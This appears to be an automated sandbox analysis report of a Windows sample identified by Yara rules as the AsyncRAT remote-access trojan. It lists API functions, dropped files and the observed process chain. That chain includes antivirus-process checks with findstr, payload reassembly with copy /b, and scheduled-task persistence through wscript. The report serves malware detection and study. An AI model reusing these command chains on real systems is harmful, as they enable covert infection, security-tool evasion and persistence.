Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00ECD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_00ECD164
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0037D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 18_2_0037D164

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript called in batch mode (surpress errors)
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E60E38 CloseHandle,NtResumeThread, 10_2_00E60E38
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA42D5: CreateFileW,DeviceIoControl,CloseHandle, 10_2_00EA42D5
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E98F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 10_2_00E98F2E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 10_2_00EA5778
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00355778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 18_2_00355778
Creates files inside the system directory
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\BlogPs Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\JamMerchant Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\RespectiveSexual Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\GeneticsFamiliar Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4B020 10_2_00E4B020
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E494E0 10_2_00E494E0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E49C80 10_2_00E49C80
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E623F5 10_2_00E623F5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC8400 10_2_00EC8400
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76502 10_2_00E76502
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4E6F0 10_2_00E4E6F0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E7265E 10_2_00E7265E
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6282A 10_2_00E6282A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E789BF 10_2_00E789BF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76A74 10_2_00E76A74
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC0A3A 10_2_00EC0A3A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E50BE0 10_2_00E50BE0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E9EDB2 10_2_00E9EDB2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6CD51 10_2_00E6CD51
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC0EB7 10_2_00EC0EB7
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA8E44 10_2_00EA8E44
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76FE6 10_2_00E76FE6
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E633B7 10_2_00E633B7
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5D45D 10_2_00E5D45D
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6F409 10_2_00E6F409
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4F6A0 10_2_00E4F6A0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E616B4 10_2_00E616B4
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E41663 10_2_00E41663
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5F628 10_2_00E5F628
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E678C3 10_2_00E678C3
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6DBA5 10_2_00E6DBA5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E61BA8 10_2_00E61BA8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E79CE5 10_2_00E79CE5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5DD28 10_2_00E5DD28
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E61FC0 10_2_00E61FC0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6BFD6 10_2_00E6BFD6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FB020 18_2_002FB020
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F94E0 18_2_002F94E0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F9C80 18_2_002F9C80
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003123F5 18_2_003123F5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00378400 18_2_00378400
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326502 18_2_00326502
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0032265E 18_2_0032265E
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FE6F0 18_2_002FE6F0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031282A 18_2_0031282A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003289BF 18_2_003289BF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00370A3A 18_2_00370A3A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326A74 18_2_00326A74
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00300BE0 18_2_00300BE0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031CD51 18_2_0031CD51
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0034EDB2 18_2_0034EDB2
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00358E44 18_2_00358E44
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00370EB7 18_2_00370EB7
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326FE6 18_2_00326FE6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F32C0 18_2_002F32C0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003133B7 18_2_003133B7
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031F409 18_2_0031F409
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030D45D 18_2_0030D45D
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030F628 18_2_0030F628
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F1663 18_2_002F1663
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003116B4 18_2_003116B4
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FF6A0 18_2_002FF6A0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003178C3 18_2_003178C3
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031DBA5 18_2_0031DBA5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00311BA8 18_2_00311BA8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00329CE5 18_2_00329CE5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F7CC9 18_2_002F7CC9
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030DD28 18_2_0030DD28
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031BFD6 18_2_0031BFD6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00311FC0 18_2_00311FC0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\438799\Dump.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00301A36 appears 34 times
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00318B30 appears 42 times
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00310D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E51A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E60D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E68B30 appears 42 times
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: String function: 004062A3 appears 58 times
Sample file is different than original file name gathered from version info
Source: DA92phBHUS.exe, 00000000.00000002.1782767831.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs DA92phBHUS.exe
Source: DA92phBHUS.exe, 00000000.00000003.1778251668.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
Uses 32bit PE files
Source: DA92phBHUS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@35/13@3/2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAA6AD GetLastError,FormatMessageW, 10_2_00EAA6AD
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E98DE9 AdjustTokenPrivileges,CloseHandle, 10_2_00E98DE9
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E99399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00E99399
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00348DE9 AdjustTokenPrivileges,CloseHandle, 18_2_00348DE9
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00349399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 18_2_00349399
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 10_2_00EA4148
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 10_2_00EA443D
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Kmswbx3MNQibZuVT
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Users\user\AppData\Local\Temp\nsdFDD7.tmp Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: DA92phBHUS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\DA92phBHUS.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DA92phBHUS.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\DA92phBHUS.exe File read: C:\Users\user\Desktop\DA92phBHUS.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DA92phBHUS.exe "C:\Users\user\Desktop\DA92phBHUS.exe"
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15 Jump to behavior
